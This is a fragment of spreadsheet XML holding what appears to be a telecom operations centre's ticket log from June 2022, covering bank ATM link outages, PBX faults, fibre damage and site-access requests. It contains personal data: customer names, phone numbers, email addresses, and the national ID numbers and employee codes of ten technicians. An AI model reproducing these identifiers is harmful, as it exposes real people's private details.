PARA: FRANCISCO EDUARDO QUEZADA GARCIA &lt;FRANCISCOED.QUEZADA@CLARO.COM.GT&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;; ERNESTO RUBIO &lt;ERNESTO.RUBIO@DAVIVIENDA.COM.SV&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACES ALARMADOS.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERNESTO RUBIO 25562049 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001112326</t>
  </si>
  <si>
    <t>F4599744</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 13 DE JUNIO DE 2022 12:34
PARA: YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;; ERNESTO.RUBIO@DAVIVIENDA.COM.SV &lt;ERNESTO.RUBIO@DAVIVIENDA.COM.SV&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: IP2001215 / BANCO DAVIVIENDA - SD1134583
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA ATECNICO SIN TENER RESPUESTA
3001027675
COLA:
NOMBRE: A: 50379876163
NÚMERO: 50379876163
DURACIÓN: 0:00:31
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 50379876163
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JANTONIO.FERNANDEZ
FECHA Y HORA LOCALES: 14/06/2022 08:38:27</t>
  </si>
  <si>
    <t>TECNICO EN SITIO A ESPERA QUE CLIENTE LLEGUE ,, FAVOR RESOLVER PARA PENDIENTE CLIENTE</t>
  </si>
  <si>
    <t>****SE LLAMA A CLIENTE ERNESTO RUBIO AL 77979726 INDICA  QUE AUN NO HA LLEGADO EL PERSONAL AL SITIO YA QUE TUVIERON UN ATRASO PERO QUE SI LES PUEDEN HACER TIEMPO LOS TECNICOS **
- ID 3001042408
**</t>
  </si>
  <si>
    <t>SELSA PROSA SE PRESENTA PERO LA LLAVE NO LES ABRE EL CAJERO, SE MOVILIZAN PARA RECOGER OTRA LLAVE, APROX LLEVARA 40 MINUTOS
3001047731
COLA:
NOMBRE: A: 50379876163
NÚMERO: 50379876163
DURACIÓN: 0:00:51
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 50379876163
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JANTONIO.FERNANDEZ
FECHA Y HORA LOCALES: 14/06/2022 09:36:43</t>
  </si>
  <si>
    <t>TECNICO A 15 MINUTOS DE CLIENTE
3001027933
COLA:
NOMBRE: A: 50379876163
NÚMERO: 50379876163
DURACIÓN: 0:00:52
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 50379876163
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JANTONIO.FERNANDEZ
FECHA Y HORA LOCALES: 14/06/2022 08:39:52</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERNESTO RUBIO AL 77979726 INDICA QUE YA ESTAN AUTORIZADOS LOS ACCESOS QUE SE PUEDE PROCEDER CON LA VISITA PARA LAS 9:00 AM**
- ID 3001014480
**</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SOLICITANDO ACCESOS
DE: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;
ENVIADO: LUNES, 13 DE JUNIO DE 2022 14:32
PARA: LUIS CHAVEZL &lt;LUIS.CHAVEZL@DAVIVIENDA.COM.SV&gt;
CC: MELVIN ESTRADA &lt;ELSALVADOR_ITTCASOS@DAVIVIENDA.COM.SV&gt;; ELSALVADOR_MONITOREOATMS &lt;ELSALVADOR_MONITOREOATMS@DAVIVIENDA.COM.SV&gt;; CARLOS AGUILARG &lt;CARLOS.AGUILARG@DAVIVIENDA.COM.SV&gt;; JOSE RODRIGUEZ &lt;JOSE.RODRIGUEZ@DAVIVIENDA.COM.SV&gt;; DAVID ALVARENGA &lt;DAVID.ALVARENGA@DAVIVIENDA.COM.SV&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: F4599744 || IP2001215SV / BANCO DAVIVIENDA //
SOLICITAMOS DE SU APOYO COORDINANDO ACCESOS A NUESTRO PERSONAL TÉCNICO.
ACTUALMENTE SE OBSERVA FUERA DE SERVICIO EL CAJERO Y ES NECESARIO COORDINAR ACCESOS PARA SU ATENCIÓN, FAVOR COMPARTIRNOS HORARIO.
DIRECCION:
UBICACIÓN PLAZA MALTA BLV ORDEN DE MALTA KM 10.5 ZONA INDUSTRIAL CARRETERA A PUERTO ANTIGUO CUSCATLAN.
ID: IP2001215SV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t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
--
IP2001215 / BANCO DAVIVIENDA - SD1134583</t>
  </si>
  <si>
    <t>F4599749</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 13 DE JUNIO DE 2022 16:04
PARA: ERNESTO RUBIO &lt;ERNESTO.RUBIO@DAVIVIENDA.COM.SV&gt;; LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;; CARLOS AGUILARG &lt;CARLOS.AGUILARG@DAVIVIENDA.COM.SV&gt;; LUIS CHAVEZL &lt;LUIS.CHAVEZL@DAVIVIENDA.COM.SV&gt;; JOSE RODRIGUEZ &lt;JOSE.RODRIGUEZ@DAVIVIENDA.COM.SV&gt;
CC: RNESTO.RUBIO@DAVIVIENDA.COM.SV &lt;RNESTO.RUBIO@DAVIVIENDA.COM.SV&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;
ASUNTO: RE: SOLICITUD DE ACCESOS F4599749 || INGENIO EL ANGEL ||
*-*-*-*-*-*-*</t>
  </si>
  <si>
    <t>EL ENLACE SE ENCUENTRA ACTIVO TECNICOS VALIDAN CONEXION EN UM  EQUIPOS DESCONECTADOS EN INSTALACIONES DE CLIENTE
&lt;SAPOSVZSN1D1EID1&gt;PING -C 1500 -M 30 -B -VPN-INSTANCE HSBC_ATM 10.152.164.84
  PING 10.152.164.84: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.152.164.84 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 3/4/7 MS
UM SIN GESTION</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERNESTO RUBIO AL 77979726 INDICA QUE NO ESTA ATENDIENDO OTRO ASUNTO Y QUE NO HA PODIDO GESTIONAR LOS ACCESOS PERO QUE EL NOS RESPONDERA VIA CORREO **
-ID 2001893751
**</t>
  </si>
  <si>
    <t>F4599753</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  PAULO ESPINALES 50586481752 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001149780</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PAULO ESPINALES 86481752 MENCIONA QUE PERSISTE EL INCONVENIENTE DE TIEMPOS ALTOS, CLIENTE INDICA QUE REENVIARA EL CORREO CON LAS PRUEBAS  A N1 Y CNOCCA
--- PAULO.ESPINALES@SCHLESINGERGROUP.COM ----
-ID 2001856538</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. PAULO ESPINALES 86481752 SE LE INFORMA DEL CORREO ENVIADO, INFORMA QUE EN OTRAS OCASIONES SI LE HAN APOYADO PARA SOLVENTAR ESTE TEMA DE LATENCIA, CONFIRMA DE ENTERADO, REALIZARA LAS VALIDACIONES NECESARIAS, SE PROCEDE AL CIERRE DEL INCIDENTE.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
RE: PRUEBAS ENLACE FIBRA ADDISON RESERACH LATENCIA ALTA-NICARAGUA</t>
  </si>
  <si>
    <t xml:space="preserve"> CLIENTE  PAULO ESPINALES 50586481752 ENVIA PRUEBAS AL CORREO, INFORMA QUE CUANDO LE ENTREGARON EL ENLACE LOS TIEMPOS DE RESPUESTA SE MANTENIAN EN 40 MS, ACTUALMENTE SE MANTIENE EN 90MS, SE ADJUNTAN PRUEBAS ENVIADOS POR CLIENTE.</t>
  </si>
  <si>
    <t xml:space="preserve"> SE LLAMA A CLIENTE  PAULO ESPINALES 50586481752 ACTUALMENTE EN LLAMADA ...</t>
  </si>
  <si>
    <t>F4599760</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE IBAN CRUZ 56939178 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001046531</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE IBAN CRUZ 56939178  PARA REALIZAR PRUEBAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE IBAN CRUZ 56939178  PARA REALIZAR PRUEBAS CLIENTE INDICA QUE PERSONAL DE LA PBX SE ENCUENTRA REVISANDO EN ESTE MOMENTO, AL FINALIZAR NOS DEVOVLERA LA LLAMADA, SE LE BRINDA NUMERO DE AE Y NUMERO DE VIVO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>-* SE HABLA CON BYRON BRAN (CLIENTE) SOLICITA SE PUEDA AGILIZAR LA VERIFICACION YA QUE HA SIDO BASTANTE REINCIDENTE LA FALLA, COMENTA QUE ABSOLUTAMENTE TODA LA HERRAMIENTA QUE LLEVEN LOS TECNICOS DEBE IR REGISTRADA SI ES NUEVA CON FACTURA Y SOLICITA SE VALIDE LA POSIBILIDAD DE INGRESAR A PIE YA QUE EL INGRESO DE VEHICULO ES UNA GESTION MUY COMPLICADA, ADICIONAL COMENTA QUE ESCALARÁ CON EL EJECUTIVO POR LOS TIEMPOS DE RESPUESTA -*
-*</t>
  </si>
  <si>
    <t>QUIEN INDICA QUE YA REALIZO EL REINICIO DE LA PBX Y DEL EQUIPO CTC, SE LE INDICA QUE ES NECESARIO QUE VALIDEN AL PBX YA QUE A ESA NO SE LE TIENE RESPUESTA, CLIENTE SOLICITA QUE SE LE DE 15 MIN PARA REALIZAR PRUEBAS ADICIONALES CON EL IT EN DADO CASO NO SOLVENTAR INDICA QUE SE LE ENVIE PERSOANL TECNICO SIN EMBARGO SE NCESITA LAS CREDENCIALES, CLIENTE ESTARA VALIDANDO SI TAMBIEN POSEE LAS CREDENCIALES DE LA PBX
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE IBAN CRUZ 56939178 MENCIONA QUE YA FINALIZARON LAS PRUEBAS PERO EL INCONVENIENTE PERSISTE
SE CONFIRMA CON CLIENTE QUE SI CUENTA CON LAS CREDENCIALES
-ID 2001888357
NOMBRE DEL CLIENTE: EXPOGRANEL, S.A.
UBICACIÓN:1 AVENIDA Y 4 CALLE INTERIOR RECINTO PORTUARIO ESCUINTLA PUERTO QUETZAL
CONTACTO EN SITIO: IBAN CRUZ 56939178
HORARIO DE ATENCION:7:00- 17:00 HRS
GESTIÓN DE PERMISOS: --  ICRUZ@EXPOGRANEL.COM   -----  DPI, NOMBRE COMPLETO, LICENCIA DE CONDUCIR, FECHA DE VENCIMIENTO DE LA LICENCIA, TIPO DE LICENCIA, SEGURO DEL VEHICULO, DETALLAR LAS HERRAMIENTAS DE PERSONAL TECNICO</t>
  </si>
  <si>
    <t>F4599785</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 71544287 ATIENDE ANA MARIA, INDICA YA NO SE ENCUENTRA EN SITIO SOLICITA QUE SE VALIDE MAÑANA A LAS 8 HRS
2001987889
COLA:
NOMBRE: A: 0050371544287
NÚMERO: 0050371544287
DURACIÓN: 0:01:29
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050371544287
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 13/06/2022 18:27:45
REPORTE::::: CAIDA TOTAL
CAUSA RAIZ:: EL SERVICIO ESTUVO AFECTADO POR DAÑO EN FIBRA
SOLUCION:::: PERSONAL ZELEDON QUIEN INDICA QUE SE TENIA DAÑO DE FO A 225 METROS DE CLIENTE POR HURTO EN FIBRA, SE REHICIERON 4 EMPALMES DE FIBRA || SERVICIO OPERATIVO Y ESTABLE</t>
  </si>
  <si>
    <t>F4599791</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DE LA CENTRAL NOC 2411-9191, EXT. 10582 Y 10583. ID: 2001886381 ATIENDE ABEL ORTEGA, INDICA QUE SE REPORTO ESE ID POR ERROR YA QUE NO ESTA DENTRO DE SUS ENLACES, AUTORIZA PROCEDER CON EL CIERRE DEL TICKET*/*/*/SE NOTIFICA A GESTOR JURGEN.BOCH PARA QUE PROCEDA AL CIERRE DE LA F4599791*/*/*/</t>
  </si>
  <si>
    <t>F4599803</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MAURICIO SILVA AL 25117115 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001906614
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MAURICIO SILVA AL 25117115 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001917418
**</t>
  </si>
  <si>
    <t>F4599816</t>
  </si>
  <si>
    <t>SE ENVIA  CORREO A CLEINTE SOLICITANDO ACCESOS
GESTION DE ACCESOS F4599816 | BANCO PROMERICA S.A. | LOURDES / COLONCTRO.COM. EL ENCUENTROCARRET. A SANTA ANALOCAL PAD 8KM 24 1/2 |
JONATHAN EDUARDO TEZEN MEJIA
BUENA TARDE ESTIMADO CLIENTE,
   ES UN GUSTO SALUDARLE, EL PRESENTE ES PARA  SOLICITAR DE SU AMABLE APOYO CON GESTIONAR ACCESOS A NUESTRA ÁREA TÉCNICA PARA VERIFICAR SERVICIO, F4599816 | BANCO PROMERICA S.A. | LOURDES / COLONCTRO.COM. EL ENCUENTROCARRET. A SANTA ANALOCAL PAD 8KM 24 1/2 |
AGRADECEMOS BRINDAR FECHA Y HORA DE VISITA
TÉCNICOS:
DUI CODIGO EMPLEADO
00936126-7 4799 MARIO ERNESTO CRUZ MARQUEZ
00354722-1 4378 RONAL MOREL CRESPIN
00157708-4 4690 ABRAHAM SAMUEL PEREZ
00580847-9 2181 CARLOS EDUARDO GOMEZ ZELEDON
02878871-1 2437 JOSE ALFREDO JIMENEZ
03245714-4 8787 ADAN ERNESTO GONZALEZ
01968544-3 9407 WALTER ERNESTO RODRIGUEZ PEREZ
01101266-2 4605 JOSE SALVADOR PORTILLO VELASQUEZ
01320096-0 9401 OSCAR RENE VIDES
04086816-7 12404 GERARDO ANTONIO MINERO
EN ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>F4599819</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON OMAR SALAS/CLIENTE 41508892 Y SE LE BRINDAN AVANCES DE LA FALLA QUE SE DESCRIBE EN CRONO ANTERIOR, AVANCES EN DOS HORAS.</t>
  </si>
  <si>
    <t>F4599827</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE   VIVIAN ROSALES 36259975 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001897490</t>
  </si>
  <si>
    <t>F4599833</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JAVIER LOPEZ 61985181 MENCIONA QUE ESTARA REALIZANDO PRUEBAS Y SI PRESENTA ALGUN PROBLEMA ESTARA REPORTANDO POR MEDIO DE CC
-ID 3001114630</t>
  </si>
  <si>
    <t>F4599838</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE ELIZABETH ESPINOZA. QUIEN VA A UBICAR LOS EQUIPOS.
2001935894
COLA:
NOMBRE: A: 0050371654296
NÚMERO: 0050371654296
DURACIÓN: 0:00:19
ESTADO: CONECTADA
DETALLES: 0050371654296
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 13/06/2022 15:10:48</t>
  </si>
  <si>
    <t>F4599849</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER REYES 45787911 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001898122</t>
  </si>
  <si>
    <t>F4599852</t>
  </si>
  <si>
    <t>SE TIENE RESPUESTA DEL CLIENTE.
DE: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;
ENVIADO: LUNES, 13 DE JUNIO DE 2022 12:25
PARA: CARLOS IVAN PALENCIA FLORES &lt;CARLOSI.PALENCIA@CLARO.COM.GT&gt;
CC: JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;
ASUNTO: RE: [SOLICITUD :##RE-761169##] : ALARMA DEL CAJERO: CC_TYT_GT_ATM3362
BUENOS DÍAS ESTIMADOS.
      INFORMO QUE EL ATM SE ENCUENTRA CON FALLA DE ENERGÍA ELECTRICA.
SALUDOS CORDIALES.
ANTHONY GARCIA
SERVICIOS 5B
PBX: (502) 2420-7200</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE, A LA ESPERA DE LA RESPUESTA.
DE: CARLOS IVAN PALENCIA FLORES
ENVIADO: LUNES, 13 DE JUNIO DE 2022 11:58
PARA: SERVICIOS5B@5B.COM.GT &lt;SERVICIOS5B@5B.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;
CC: FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: ALARMA DEL CAJERO: CC_TYT_GT_ATM3362
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM33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99852
ID: 47502310T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM3362
UBICADO EN: CAJERO 3362 LIBRERIA Y PAPELERIA ZARAGOZA, 2 C. 1-47 Z.2 ZARAGOZA CHIMALTENANGO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.  SALUDOS.</t>
  </si>
  <si>
    <t>F4599853</t>
  </si>
  <si>
    <t>CLIENTE NO CONTESTA DESPUES DE VARIOS INTENTOS, POSIBLEMENTE CLIENTE SE ENCUENTRE EN SU HORA DE ALMUERZO, SE INTENTARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE   ELDER GROGORIO 30205690
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A ELDER GROGORIO AL NUMERO 30205690 NUEVAMENTE PARA REALIZAR PRUEBAS, CLIENTE SIGUE SIN RESPONDER, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ELDER GROGORIO AL 30205690 INDICA QUE ESTA EN EL SITIO || SE NOTIFICA A GESTOR **
-ID 2001886616
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BAGNER GONZALEZ  AL 51787546 INDICA QUE ESTA EN HORA DE ALMUERZO QUE SE LLAME AL
NUMERO 30205690 **
-ID 2001886128
**</t>
  </si>
  <si>
    <t>F4599856</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JORGE FAJARDO 50159388 CONFIRMA SERVICIO ESTABLE Y OPERATIVO
-ID 3001135648
**</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE CON EVIDENCIAS QUE POR PARTE DE CLARO SERVICIO RESPONDE CORRECTAMENTE---
TICKET 1134509 - FINCA GUATEMALA</t>
  </si>
  <si>
    <t>SE COMPARTE GRAFICA A CLIENTE Y SE LE CONSULTA SI PERSISTE INCONVENIENTE--
TICKET 1134509 - FINCA GUATEMALA
&gt;&gt; POR MOTIVOS DE PRUEBA SE QUITO LIMITANTE EN CTC NODO-</t>
  </si>
  <si>
    <t>SE COMPARTE GRAFICA A CLIENTE Y SE LE CONSULTA SI PERSISTE INCONVENIENTE--
TICKET 1134509 - FINCA GUATEMALA</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE FAJARDO 50159388  MENCIONA QUE ESTA REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMADA EN 30MIN
-ID 3001126745</t>
  </si>
  <si>
    <t>F4599863</t>
  </si>
  <si>
    <t>EN LINEA CON CLIENTE PAOLA VASQUEZ 55719808, ESTA APOYANDO A UBICAR SU PLANTA PBX</t>
  </si>
  <si>
    <t>CLIENTE LOGRA UBICAR SU PBX Y PROCEDE A REINICIARLO, TAMBIÉN REINICIA ASMI52 PERO CONTINUA SIN RECIBIR LLAMADAS, POSIBLE PROBLEMA DE LA PBX, A  NIVEL DE CLARO NO SE OBSERVA INCONVENIENTE. ID DE LLAMADA: 2001874040</t>
  </si>
  <si>
    <t>F4599873</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDUARDO HERRERA 23124056 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001853431</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  EDUARDO HERRERA 23124056 MENCIONA QUE AUN ESTA GESTIONANDO LOS PERMISOS
CLIENTE INDICA QUE LE PODRIAN BRINDAR LOS PERMISOS EN UN TIEMPO MAXIMO DE 2 DIAS
-ID 1001482069</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDUARDO HERRERA 23124056 MENCIONA QUE ESTA PENDIENTE DE QUE AUTORICEN LOS INGRESOS POR LO QUE SOLICITA SEGUIMIENTO PARA MAÑANA A LAS 14:00 HRS
-ID 1001285002</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDUARDO HERRERA 23124056 MENCIONA QUE ESTA PENDIENTE DE QUE LA ADUANA AUTORICE EL INGRESO POR LAS HERRAMIENTAS
CLIENTE MENCIONA QUE POSIBLEMENTE HOY LES DEN LOS PERMISOS Y SI ES ASI ESTARA RESPONDIENDO POR CORREO
-ID 1001783995</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDUARDO HERRERA 23124056 PERO NO RESPONDE
-ID 1001913484</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE EDUARDO, NO RESPODNE, NO SE TIENE NADA SOBRE LOS PERMISOS DE INGRESO AL AEROPUERTO.
1001241062
COLA:
NOMBRE: A: 0050323124056
NÚMERO: 0050323124056
DURACIÓN: 0:00:38
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050323124056
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 20/06/2022 14:29:33</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDUARDO HERRERA 23124056 MENCIONA QUE AUN NO LE HAN AUTORIZADO EL INGRESO DE LAS HERRAMIENTAS POR LO QUE INDICA QUE RESPONDERA CUANDO YA TENGA LOS PERMISOS
-ID 2001031713</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDUARDO HERRERA 23124056 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001955734</t>
  </si>
  <si>
    <t>CLIENTE EDUARDO SOLICITA SE LE MARQUE EN 30 MINUTOS YA QUE NO SE PUDO MOVILIZAR
3001056524
COLA:
NOMBRE: A: 0050364264472
NÚMERO: 0050364264472
DURACIÓN: 0:00:35
ESTADO: CONECTADA
DETALLES: 0050364264472
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 14/06/2022 09:57:43</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDUARDO HERRERA AL 23124056 INDICA QUE NO SE ENCUENTRA EN EL SITIO PERO INDICA QUE ESTARA ENVIANDO FOTOS DE LOS EQUIPOS Y ESTARA INDICANDO VIA CORREO CUANDO YA TENGA A ALGUIEN EN SITIO SE LE BRINDAN LOS CORREOS **
-ID 2001889107
**
**</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE CON EL DATO DEL EMULADO PARA QUE SE AGREGUE A LA LISTA DE HERRAMIENTAS A INGRESAR AL PR. SE QUEDA A LA ESPERA DE LA RESPUESTA DEL CLIENTE.
RE: CASO: SD1134626 //23464200 / AEROMANTENIMIENTO, S.A
ESVIN ANTONIO PAREDES SAMUY
ESTIMADO CLIENTE CON RESPECTO DE LAS HERRAMIENTAS TAMBIÉN SE INGRESARÁ UN EMULADOR
SUNSET E20
PARA HACER PRUEBAS CON LA SEÑAL DEL E1, SOLICITAMOS NOS PUEDA APOYAR CON AGREGARLO AL LISTADO DE HERRAMIENTAS QUE NOS PERMITIRAN INGRESAR A SUS INSTALACIONES.
